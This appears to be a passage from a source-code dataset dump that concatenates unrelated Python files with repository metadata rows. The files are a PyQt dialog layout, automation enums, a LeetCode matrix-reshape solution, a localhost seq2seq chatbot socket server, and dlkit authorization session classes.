self.ck_inputLine.setMinimumSize(QtCore.QSize(280, 27))
self.ck_inputLine.setMaximumSize(QtCore.QSize(280, 27))
font = QtGui.QFont()
font.setFamily("fonts/SourceSansPro-Regular.ttf")
font.setPointSize(9)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.ck_inputLine.setFont(font)
self.ck_inputLine.setStyleSheet("QLineEdit {\n"
" border-radius: 3px;\n"
" padding: 1px 4px 1px 4px;\n"
" background-color: rgb(255, 255, 255);\n"
"}")
self.ck_inputLine.setFrame(False)
self.ck_inputLine.setObjectName("ck_inputLine")
self.horizontalLayout_2.addWidget(self.ck_inputLine)
spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem4)
self.gridLayout.addLayout(self.horizontalLayout_2, 2, 0, 1, 2)
spacerItem5 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.gridLayout.addItem(spacerItem5, 3, 1, 1, 1)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem6 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem6)
self.ck_submitButton = QtWidgets.QToolButton(Addsite)
self.ck_submitButton.setMinimumSize(QtCore.QSize(93, 27))
self.ck_submitButton.setMaximumSize(QtCore.QSize(93, 27))
font = QtGui.QFont()
font.setFamily("fonts/SourceSansPro-Regular.ttf")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
font.setKerning(True)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.ck_submitButton.setFont(font)
self.ck_submitButton.setStyleSheet("QToolButton {\n"
" border: 1px solid #acacac;\n"
" border-radius: 1px;\n"
" background-color: qlineargradient(x1:0, y1:0, x2:0, y2:1,\n"
" stop:0 #f0f0f0, stop:1 #e5e5e5);\n"
"}\n"
"\n"
"QToolButton:hover {\n"
" border: 1px solid #7eb4ea;\n"
" border-radius: 1px;\n"
" background-color: qlineargradient(x1:0, y1:0, x2:0, y2:1,\n"
" stop:0 #ecf4fc, stop:1 #dcecfc);\n"
"}\n"
"\n"
"QToolButton:pressed {\n"
" border: 1px solid #579de5;\n"
" border-radius: 1px;\n"
" background-color: qlineargradient(x1:0, y1:0, x2:0, y2:1,\n"
" stop:0 #daecfc, stop:1 #c4e0fc);\n"
"}")
self.ck_submitButton.setObjectName("ck_submitButton")
self.horizontalLayout.addWidget(self.ck_submitButton)
spacerItem7 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem7)
self.ck_cancelButton = QtWidgets.QToolButton(Addsite)
self.ck_cancelButton.setMinimumSize(QtCore.QSize(93, 27))
self.ck_cancelButton.setMaximumSize(QtCore.QSize(93, 27))
font = QtGui.QFont()
font.setFamily("fonts/SourceSansPro-Regular.ttf")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
font.setKerning(True)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.ck_cancelButton.setFont(font)
self.ck_cancelButton.setStyleSheet("QToolButton {\n"
" border: 1px solid #acacac;\n"
" border-radius: 1px;\n"
" background-color: qlineargradient(x1:0, y1:0, x2:0, y2:1,\n"
" stop:0 #f0f0f0, stop:1 #e5e5e5);\n"
"}\n"
"\n"
"QToolButton:hover {\n"
" border: 1px solid #7eb4ea;\n"
" border-radius: 1px;\n"
" background-color: qlineargradient(x1:0, y1:0, x2:0, y2:1,\n"
" stop:0 #ecf4fc, stop:1 #dcecfc);\n"
"}\n"
"\n"
"QToolButton:pressed {\n"
" border: 1px solid #579de5;\n"
" border-radius: 1px;\n"
" background-color: qlineargradient(x1:0, y1:0, x2:0, y2:1,\n"
" stop:0 #daecfc, stop:1 #c4e0fc);\n"
"}")
self.ck_cancelButton.setObjectName("ck_cancelButton")
self.horizontalLayout.addWidget(self.ck_cancelButton)
spacerItem8 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem8)
self.gridLayout.addLayout(self.horizontalLayout, 4, 0, 1, 2)
self.retranslateUi(Addsite)
QtCore.QMetaObject.connectSlotsByName(Addsite)
def retranslateUi(self, Addsite):
_translate = QtCore.QCoreApplication.translate
Addsite.setWindowTitle(_translate("Addsite", "Add a new CheckBox"))
self.label.setText(_translate("Addsite", "Please, enter a name for the new Ground Site."))
self.ck_submitButton.setText(_translate("Addsite", "Submit"))
self.ck_cancelButton.setText(_translate("Addsite", "Cancel"))
| 46.702381 | 115 | 0.672827 | 7,607 | 0.969539 | 0 | 0 | 0 | 0 | 0 | 0 | 2,166 | 0.276064 |
cdf8ea07b2a210313250ff1ccb9f4bf6d44a0053 | 1,772 | py | Python | testmile-setu/setu/dispatcher/broker.py | test-mile/setu | b273a11e7f9462e64a370bda16f1952ecdbfb5a5 | [
"Apache-2.0"
]
| null | null | null | testmile-setu/setu/dispatcher/broker.py | test-mile/setu | b273a11e7f9462e64a370bda16f1952ecdbfb5a5 | [
"Apache-2.0"
]
| null | null | null | testmile-setu/setu/dispatcher/broker.py | test-mile/setu | b273a11e7f9462e64a370bda16f1952ecdbfb5a5 | [
"Apache-2.0"
]
| null | null | null | from enum import Enum, auto
class SetuGuiAutoActorStateActionType(Enum):
INIT_STATE = auto()
END_STATE = auto()
class SetuGuiAutoActorAutomatorActionType(Enum):
LAUNCH = auto()
QUIT = auto()
GO_TO_URL = auto()
GO_BACK = auto()
GO_FORWARD = auto()
REFRESH = auto()
EXECUTE_JAVASCRIPT = auto()
FIND_ELEMENT = auto()
FIND_MULTIELEMENT = auto()
GET_CURRENT_WINDOW_HANDLE = auto()
GET_WINDOW_TITLE = auto()
MAXIMIZE_WINDOW = auto()
GET_CURRENT_WINDOW_SIZE = auto()
SET_WINDOW_SIZE = auto()
GET_ALL_WINDOW_HANDLES = auto()
SWITCH_TO_WINDOW = auto()
CLOSE_CURRENT_WINDOW = auto()
IS_ALERT_PRESENT = auto()
CONFIRM_ALERT = auto()
DISMISS_ALERT = auto()
GET_TEXT_FROM_ALERT = auto()
SEND_TEXT_TO_ALERT = auto()
GET_CURRENT_VIEW_CONTEXT = auto()
GET_ALL_VIEW_CONTEXTS = auto()
SWITCH_TO_VIEW_CONTEXT = auto()
JUMP_TO_FRAME = auto()
JUMP_TO_PARENT_FRAME = auto()
JUMP_TO_DOM_ROOT = auto()
class SetuGuiAutoActorElementActionType(Enum):
FIND_MULTIELEMENT = auto()
FIND_ELEMENT = auto()
CLICK = auto()
CLEAR_TEXT = auto()
SEND_TEXT = auto()
IS_SELECTED = auto()
IS_VISIBLE = auto()
IS_CLICKABLE = auto()
GET_TAG_NAME = auto()
GET_ATTR_VALUE = auto()
GET_TEXT_CONTENT = auto()
class SetuActorDriverConfigOption(Enum):
GUIAUTO_AUTOMATOR_NAME = auto()
GUIAUTO_CONTEXT = auto()
# Browser (Common)
BROWSER_NAME = auto()
BROWSER_BIN_PATH = auto()
BROWSER_PROXY_ON = auto()
BROWSER_PROXY_HOST = auto()
BROWSER_PROXY_PORT = auto()
MOBILE_OS_NAME = auto()
# Selenium
SELENIUM_DRIVER_PROP = auto()
SELENIUM_DRIVER_PATH = auto()
# Appium
APPIUM_HUB_URL = auto()
APPIUM_AUTO_LAUNCH = auto()
| 23.012987 | 48 | 0.682844 | 1,736 | 0.979684 | 0 | 0 | 0 | 0 | 0 | 0 | 36 | 0.020316 |
cdf8f1196a3909edc36aafce5347c3143f73a6ac | 76 | py | Python | conductor/utils/inputs.py | JoelLefkowitz/conductor | 9a5d3a833c17bd57080e538ea7584620560d9235 | [
"MIT"
]
| 1 | 2021-08-21T21:34:22.000Z | 2021-08-21T21:34:22.000Z | conductor/utils/inputs.py | JoelLefkowitz/conductor | 9a5d3a833c17bd57080e538ea7584620560d9235 | [
"MIT"
]
| null | null | null | conductor/utils/inputs.py | JoelLefkowitz/conductor | 9a5d3a833c17bd57080e538ea7584620560d9235 | [
"MIT"
]
| null | null | null | def prompt(msg: str) -> bool:
return input(msg).lower() in ["y", "yes"]
| 25.333333 | 45 | 0.578947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 | 0.105263 |
cdf93d47f329e66522fe3776469675377c2e7349 | 1,758 | py | Python | leetcode/0566_reshape_the_matrix.py | chaosWsF/Python-Practice | ff617675b6bcd125933024bb4c246b63a272314d | [
"BSD-2-Clause"
]
| null | null | null | leetcode/0566_reshape_the_matrix.py | chaosWsF/Python-Practice | ff617675b6bcd125933024bb4c246b63a272314d | [
"BSD-2-Clause"
]
| null | null | null | leetcode/0566_reshape_the_matrix.py | chaosWsF/Python-Practice | ff617675b6bcd125933024bb4c246b63a272314d | [
"BSD-2-Clause"
]
| null | null | null | """
In MATLAB, there is a very useful function called 'reshape', which can reshape a matrix into
a new one with different size but keep its original data. You're given a matrix represented
by a two-dimensional array, and two positive integers r and c representing the row number and
column number of the wanted reshaped matrix, respectively. The reshaped matrix need to be filled
with all the elements of the original matrix in the same row-traversing order as they were. If
the 'reshape' operation with given parameters is possible and legal, output the new reshaped
matrix; Otherwise, output the original matrix.
Example 1:
Input:
nums = [[1, 2], [3, 4]]
r = 1, c = 4
Output:
[[1, 2, 3, 4]]
Explanation:
The row-traversing of nums is [1, 2, 3, 4]. The new reshaped matrix is a 1 * 4 matrix, fill
it row by row by using the previous list.
Example 2:
Input:
nums = [[1, 2], [3, 4]]
r = 2, c = 4
Output:
[[1, 2], [3, 4]]
Explanation:
There is no way to reshape a 2 * 2 matrix to a 2 * 4 matrix. So output the original matrix.
Note:
1. The height and width of the given matrix is in range [1, 100].
2. The given r and c are all positive.
"""
class Solution:
def matrixReshape1(self, nums, r, c): # 96ms
elements = sum(nums, [])
n = len(elements)
if r * c != n:
return nums
else:
return [elements[i:i+c] for i in range(0, n, c)]
def matrixReshape2(self, nums, r, c): # 88ms
if len(nums[0]) * len(nums) != r * c:
return nums
else:
elements = sum(nums, [])
return [elements[i:i+c] for i in range(0, len(elements), c)]
| 33.807692 | 100 | 0.606371 | 495 | 0.28157 | 0 | 0 | 0 | 0 | 0 | 0 | 1,271 | 0.722981 |
cdfba4673ccb2b05e2ef7ddcaa8aeaa3095e7451 | 4,629 | py | Python | python/main.py | LaraProject/rnn2java | f35b1b98f74864d4310e7866ad5271ae5389292d | [
"MIT"
]
| null | null | null | python/main.py | LaraProject/rnn2java | f35b1b98f74864d4310e7866ad5271ae5389292d | [
"MIT"
]
| null | null | null | python/main.py | LaraProject/rnn2java | f35b1b98f74864d4310e7866ad5271ae5389292d | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
import socket
import select
from time import sleep
import message_pb2
from google.protobuf.internal import encoder
import tensorflow as tf
from tensorflow.keras import preprocessing
import pickle
import numpy as np
## RNN part
# Load the inference model
def load_inference_models(enc_file, dec_file):
encoder_model = tf.keras.models.load_model(enc_file)
decoder_model = tf.keras.models.load_model(dec_file)
return (encoder_model, decoder_model)
# Load the tokenizer
def load_tokenizer(tokenizer_file):
with open(tokenizer_file, 'rb') as handle:
tokenizer = pickle.load(handle)
return tokenizer
def load_length(length_file):
with open(length_file, "r") as f:
data = ((f.read()).split(","))
return int(data[0]), int(data[1])
# Talking with our Chatbot
def str_to_tokens( sentence : str, tokenizer, maxlen_questions):
words = sentence.lower().split()
tokens_list = list()
for word in words:
if word in tokenizer.word_index:
tokens_list.append(tokenizer.word_index[word])
else:
tokens_list.append(tokenizer.word_index['<unk>'])
return preprocessing.sequence.pad_sequences([tokens_list],
maxlen=maxlen_questions, padding='post')
def answer(question, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers):
states_values = enc_model.predict(str_to_tokens(question, tokenizer, maxlen_questions))
empty_target_seq = np.zeros((1, 1))
empty_target_seq[0, 0] = tokenizer.word_index['<start>']
stop_condition = False
decoded_translation = ''
while not stop_condition:
(dec_outputs, h, c) = dec_model.predict([empty_target_seq]
+ states_values)
sampled_word_index = np.argmax(dec_outputs[0, -1, :])
sampled_word = None
for (word, index) in tokenizer.word_index.items():
if sampled_word_index == index:
decoded_translation += ' {}'.format(word)
sampled_word = word
if sampled_word == '<end>' or len(decoded_translation.split()) > maxlen_answers:
stop_condition = True
empty_target_seq = np.zeros((1, 1))
empty_target_seq[0, 0] = sampled_word_index
states_values = [h, c]
return (decoded_translation[:-5]) # remove end w
### END RNN PART ###
PORT = 9987
def recvall(sock):
BUFF_SIZE = 4096 # 4 KiB
data = b''
while True:
part = sock.recv(BUFF_SIZE)
data += part
if len(part) < BUFF_SIZE:
# either 0 or end of data
break
return data
def answer_command(question, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers):
command = message_pb2.Command()
command.type = message_pb2.Command.ANSWER
command.name = 'ANSWER to "' + question + '"'
command.data = answer(question, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers)
return command
def main():
# Connect over TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', PORT))
sock.listen(5)
# Current person
max_lengths = [[22,74]]
person = 1
enc_model, dec_model = load_inference_models("../models/" + str(person) + "/model_enc.h5", "../models/" + str(person) + "/model_dec.h5")
tokenizer = load_tokenizer("../models/" + str(person) + "/tokenizer.pickle")
maxlen_questions, maxlen_answers = load_length("../models/" + str(person) + "/length.txt")
cmd = message_pb2.Command()
over = False
while True and (not over):
conn, addr = sock.accept()
#conn.setblocking(0)
while True:
data = conn.recv(4096)
if not data: break
ready = select.select([conn], [], [], 1.0)
if ready[0]:
data += recvall(conn)
cmd.ParseFromString(data)
if (cmd.type == message_pb2.Command.CommandType.QUESTION):
print("Question : '" + cmd.data + "' received.")
conn.send(answer_command(cmd.data, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers).SerializeToString())
print("Question answered.")
conn.close()
break
elif (cmd.type == message_pb2.Command.CommandType.ANSWER):
print("Error, only questions are accepted.")
over = True
conn.close()
break
elif (cmd.type == message_pb2.Command.CommandType.SWITCH_PERSON):
print("Switching to person" + cmd.data)
person = int(cmd.data)
enc_model, dec_model = load_inference_models("../models/" + str(person) + "/model_enc.h5", "../models/" + str(person) + "/model_dec.h5")
tokenizer = load_tokenizer("../models/" + str(person) + "/tokenizer.pickle")
maxlen_questions, maxlen_answers = load_length("../models/" + str(person) + "/length.txt")
conn.close()
break
elif (cmd.type == message_pb2.Command.CommandType.SHUTDOWN):
print("Quiting.")
over = True
conn.close()
break
sleep(1)
sock.close()
if __name__ == '__main__':
main()
| 32.598592 | 140 | 0.712249 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 653 | 0.141067 |
cdfbbb1e16902c1d3761509ecf7d21633da2152a | 161,322 | py | Python | dlkit/json_/authorization/sessions.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
]
| 2 | 2018-02-23T12:16:11.000Z | 2020-10-08T17:54:24.000Z | dlkit/json_/authorization/sessions.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
]
| 87 | 2017-04-21T18:57:15.000Z | 2021-12-13T19:43:57.000Z | dlkit/json_/authorization/sessions.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
]
| 1 | 2018-03-01T16:44:25.000Z | 2018-03-01T16:44:25.000Z | """JSON implementations of authorization sessions."""
# pylint: disable=no-init
# Numerous classes don't require __init__.
# pylint: disable=too-many-public-methods,too-few-public-methods
# Number of methods are defined in specification
# pylint: disable=protected-access
# Access to protected methods allowed in package json package scope
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
from bson.objectid import ObjectId
from . import objects
from . import queries
from .. import utilities
from ..id.objects import IdList
from ..osid import sessions as osid_sessions
from ..osid.sessions import OsidSession
from ..primitives import DateTime
from ..primitives import Id
from ..primitives import Type
from ..utilities import JSONClientValidated
from ..utilities import PHANTOM_ROOT_IDENTIFIER
from ..utilities import overlap
from dlkit.abstract_osid.authorization import sessions as abc_authorization_sessions
from dlkit.abstract_osid.authorization.objects import AuthorizationForm as ABCAuthorizationForm
from dlkit.abstract_osid.authorization.objects import VaultForm as ABCVaultForm
from dlkit.abstract_osid.id.primitives import Id as ABCId
from dlkit.abstract_osid.osid import errors
from dlkit.abstract_osid.type.primitives import Type as ABCType
DESCENDING = -1
ASCENDING = 1
CREATED = True
UPDATED = True
ENCLOSURE_RECORD_TYPE = Type(
identifier='enclosure',
namespace='osid-object',
authority='ODL.MIT.EDU')
COMPARATIVE = 0
PLENARY = 1
class AuthorizationSession(abc_authorization_sessions.AuthorizationSession, osid_sessions.OsidSession):
"""This is the basic session for verifying authorizations."""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._kwargs = kwargs
# def _get_qualifier_idstrs(self, qualifier_id):
# def generate_qualifier_ids():
# try:
# authority = qualifier_id.get_identifier_namespace().split('.')[0].upper()
# identifier = qualifier_id.get_identifier_namespace().split('.')[1].upper()
# except:
# return [str(qualifier_id)]
# root_qualifier_id = Id(
# authority=qualifier_id.get_authority(),
# namespace=qualifier_id.get_identifier_namespace(),
# identifier='ROOT')
# if qualifier_id.get_identifier() == 'ROOT':
# return [str(root_qualifier_id)]
# hierarchy_mgr = self._get_provider_manager('HIERARCHY') # local=True ???
# hierarchy_session = hierarchy_mgr.get_hierarchy_traversal_session_for_hierarchy(
# Id(authority=authority,
# namespace='CATALOG',
# identifier=identifier),
# proxy=self._proxy)
# node = hierarchy_session.get_nodes(qualifier_id, 10, 0, False)
# return self._get_ancestor_idstrs(node) + [str(root_qualifier_id)]
# use_caching = False
# try:
# config = self._runtime.get_configuration()
# parameter_id = Id('parameter:useCachingForQualifierIds@mongo')
# if config.get_value_by_parameter(parameter_id).get_boolean_value():
# use_caching = True
# else:
# pass
# except (AttributeError, KeyError, errors.NotFound):
# pass
# if use_caching:
# import memcache
# mc = memcache.Client(['127.0.0.1:11211'], debug=0)
#
# key = 'hierarchy-qualifier-ids-{0}'.format(str(qualifier_id))
#
# if mc.get(key) is None:
# qualifier_ids = generate_qualifier_ids()
# mc.set(key, qualifier_ids, time=30 * 60)
# else:
# qualifier_ids = mc.get(key)
# else:
# qualifier_ids = generate_qualifier_ids()
# return qualifier_ids
#
# def _get_ancestor_idstrs(self, node):
# def get_ancestors(internal_node):
# node_list = [str(internal_node.get_id())]
# if internal_node.has_parents():
# for parent_node in internal_node.get_parents():
# node_list += self._get_ancestor_idstrs(parent_node)
# return list(set(node_list))
#
# use_caching = False
# try:
# config = self._runtime.get_configuration()
# parameter_id = Id('parameter:useCachingForQualifierIds@json')
# if config.get_value_by_parameter(parameter_id).get_boolean_value():
# use_caching = True
# else:
# pass
# except (AttributeError, KeyError, errors.NotFound):
# pass
# if use_caching:
# import memcache
# mc = memcache.Client(['127.0.0.1:11211'], debug=0)
#
# key = 'ancestor-ids-{0}'.format(str(node.ident))
#
# if mc.get(key) is None:
# ancestor_ids = get_ancestors(node)
# mc.set(key, ancestor_ids, time=30 * 60)
# else:
# ancestor_ids = mc.get(key)
# else:
# ancestor_ids = get_ancestors(node)
# return ancestor_ids
def _get_hierarchy_session(self, hierarchy_id):
"""Returns a hierarchy traversal session for the hierarchy"""
hierarchy_mgr = self._get_provider_manager('HIERARCHY', local=True)
return hierarchy_mgr.get_hierarchy_traversal_session_for_hierarchy(
hierarchy_id,
proxy=self._proxy)
def _caching_enabled(self):
"""Returns True if caching is enabled per configuration, false otherwise."""
try:
config = self._runtime.get_configuration()
parameter_id = Id('parameter:useCachingForQualifierIds@json')
if config.get_value_by_parameter(parameter_id).get_boolean_value():
return True
else:
return False
except (AttributeError, KeyError, errors.NotFound):
return False
def _get_parent_id_list(self, qualifier_id, hierarchy_id):
"""Returns list of parent id strings for qualifier_id in hierarchy.
Uses memcache if caching is enabled.
"""
if self._caching_enabled():
key = 'parent_id_list_{0}'.format(str(qualifier_id))
# If configured to use memcache as the caching engine, use it.
# Otherwise default to diskcache
caching_engine = 'diskcache'
try:
config = self._runtime.get_configuration()
parameter_id = Id('parameter:cachingEngine@json')
caching_engine = config.get_value_by_parameter(parameter_id).get_string_value()
except (AttributeError, KeyError, errors.NotFound):
pass
if caching_engine == 'memcache':
import memcache
caching_host = '127.0.0.1:11211'
try:
config = self._runtime.get_configuration()
parameter_id = Id('parameter:cachingHostURI@json')
caching_host = config.get_value_by_parameter(parameter_id).get_string_value()
except (AttributeError, KeyError, errors.NotFound):
pass
mc = memcache.Client([caching_host], debug=0)
parent_id_list = mc.get(key)
if parent_id_list is None:
parent_ids = self._get_hierarchy_session(hierarchy_id).get_parents(qualifier_id)
parent_id_list = [str(parent_id) for parent_id in parent_ids]
mc.set(key, parent_id_list)
elif caching_engine == 'diskcache':
import diskcache
with diskcache.Cache('/tmp/dlkit_cache') as cache:
# A little bit non-DRY, since it's almost the same as for memcache above.
# However, for diskcache.Cache, we have to call ".close()" or use a
# ``with`` statement to safeguard calling ".close()", so we keep this
# separate from the memcache implementation.
parent_id_list = cache.get(key)
if parent_id_list is None:
parent_ids = self._get_hierarchy_session(hierarchy_id).get_parents(qualifier_id)
parent_id_list = [str(parent_id) for parent_id in parent_ids]
cache.set(key, parent_id_list)
else:
raise errors.NotFound('The {0} caching engine was not found.'.format(caching_engine))
else:
parent_ids = self._get_hierarchy_session(hierarchy_id).get_parents(qualifier_id)
parent_id_list = [str(parent_id) for parent_id in parent_ids]
return parent_id_list
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_access_authorizations(self):
"""Tests if this user can perform authorization checks.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if authorization methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return True
@utilities.arguments_not_none
def is_authorized(self, agent_id, function_id, qualifier_id):
"""Determines if the given agent is authorized.
An agent is authorized if an active authorization exists whose
``Agent,`` ``Function`` and ``Qualifier`` matches the supplied
parameters. Authorizations may be defined using groupings or
hieratchical structures for both the ``Agent`` and the
``Qualifier`` but are queried in the de-nornmalized form.
The ``Agent`` is generally determined through the use of an
Authentication OSID. The ``Function`` and ``Qualifier`` are
already known as they map to the desired authorization to
validate.
arg: agent_id (osid.id.Id): the ``Id`` of an ``Agent``
arg: function_id (osid.id.Id): the ``Id`` of a ``Function``
arg: qualifier_id (osid.id.Id): the ``Id`` of a ``Qualifier``
return: (boolean) - ``true`` if the user is authorized,
``false`` othersise
raise: NotFound - ``function_id`` is not found
raise: NullArgument - ``agent_id`` , ``function_id`` or
``qualifier_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure making request
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: Authorizations may be stored in a
normalized form with respect to various Resources and created
using specific nodes in a ``Function`` or ``Qualifer``
hierarchy. The provider needs to maintain a de-normalized
implicit authorization store or expand the applicable
hierarchies on the fly to honor this query. Querying the
authorization service may in itself require a separate
authorization. A ``PermissionDenied`` is a result of this
authorization failure. If no explicit or implicit authorization
exists for the queried tuple, this method should return
``false``.
"""
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
def is_parent_authorized(catalog_id):
"""Recursively checks parents for implicit authorizations"""
parent_id_list = self._get_parent_id_list(catalog_id, hierarchy_id)
if parent_id_list:
try:
collection.find_one(
{'agentId': str(agent_id),
'functionId': str(function_id),
'qualifierId': {'$in': parent_id_list}})
except errors.NotFound:
for parent_id in parent_id_list:
if is_parent_authorized(Id(parent_id)):
return True
return False
else:
return True
else:
return False
# Check first for an explicit or 'ROOT' level implicit authorization:
try:
authority = qualifier_id.get_identifier_namespace().split('.')[0].upper()
identifier = qualifier_id.get_identifier_namespace().split('.')[1].upper()
except KeyError:
idstr_list = [str(qualifier_id)]
authority = identifier = None
else:
# handle aliased IDs
package_name = qualifier_id.get_identifier_namespace().split('.')[0]
qualifier_id = self._get_id(qualifier_id, package_name)
root_qualifier_id = Id(
authority=qualifier_id.get_authority(),
namespace=qualifier_id.get_identifier_namespace(),
identifier='ROOT')
idstr_list = [str(root_qualifier_id), str(qualifier_id)]
try:
collection.find_one(
{'agentId': str(agent_id),
'functionId': str(function_id),
'qualifierId': {'$in': idstr_list}})
# Otherwise check for implicit authorization through inheritance:
except errors.NotFound:
if authority and identifier:
hierarchy_id = Id(authority=authority,
namespace='CATALOG',
identifier=identifier)
return is_parent_authorized(qualifier_id)
else:
return False
else:
return True
@utilities.arguments_not_none
def get_authorization_condition(self, function_id):
"""Gets the ``AuthorizationCondition`` for making conditional authorization checks.
arg: function_id (osid.id.Id): the ``Id`` of a ``Function``
return: (osid.authorization.AuthorizationCondition) - an
authorization condition
raise: NotFound - ``function_id`` is not found
raise: NullArgument - ``function_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure making request
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def is_authorized_on_condition(self, agent_id, function_id, qualifier_id, condition):
"""Determines if the given agent is authorized.
An agent is authorized if an active authorization exists whose
``Agent,`` ``Function`` and ``Qualifier`` matches the supplied
parameters. Authorizations may be defined using groupings or
hieratchical structures for both the ``Agent`` and the
``Qualifier`` but are queried in the de-nornmalized form.
The ``Agent`` is generally determined through the use of an
Authentication OSID. The ``Function`` and ``Qualifier`` are
already known as they map to the desired authorization to
validate.
arg: agent_id (osid.id.Id): the ``Id`` of an ``Agent``
arg: function_id (osid.id.Id): the ``Id`` of a ``Function``
arg: qualifier_id (osid.id.Id): the ``Id`` of a ``Qualifier``
arg: condition (osid.authorization.AuthorizationCondition):
an authorization condition
return: (boolean) - ``true`` if the user is authorized,
``false`` othersise
raise: NotFound - ``function_id`` is not found
raise: NullArgument - ``agent_id`` , ``function_id,
qualifier_id`` , or ``condition`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure making request
raise: Unsupported - ``condition`` is not of this service
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: Authorizations may be stored in a
normalized form with respect to various Resources and created
using specific nodes in a ``Function`` or ``Qualifer``
hierarchy. The provider needs to maintain a de-normalized
implicit authorization store or expand the applicable
hierarchies on the fly to honor this query. Querying the
authorization service may in itself require a separate
authorization. A ``PermissionDenied`` is a result of this
authorization failure. If no explicit or implicit authorization
exists for the queried tuple, this method should return
``false``.
"""
raise errors.Unimplemented()
class AuthorizationLookupSession(abc_authorization_sessions.AuthorizationLookupSession, osid_sessions.OsidSession):
"""This session defines methods to search and retrieve ``Authorization`` mappings."""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._kwargs = kwargs
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_lookup_authorizations(self):
"""Tests if this user can perform authorization lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.can_lookup_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def use_comparative_authorization_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_comparative_resource_view
self._use_comparative_object_view()
def use_plenary_authorization_view(self):
"""A complete view of the ``Authorization`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_plenary_resource_view
self._use_plenary_object_view()
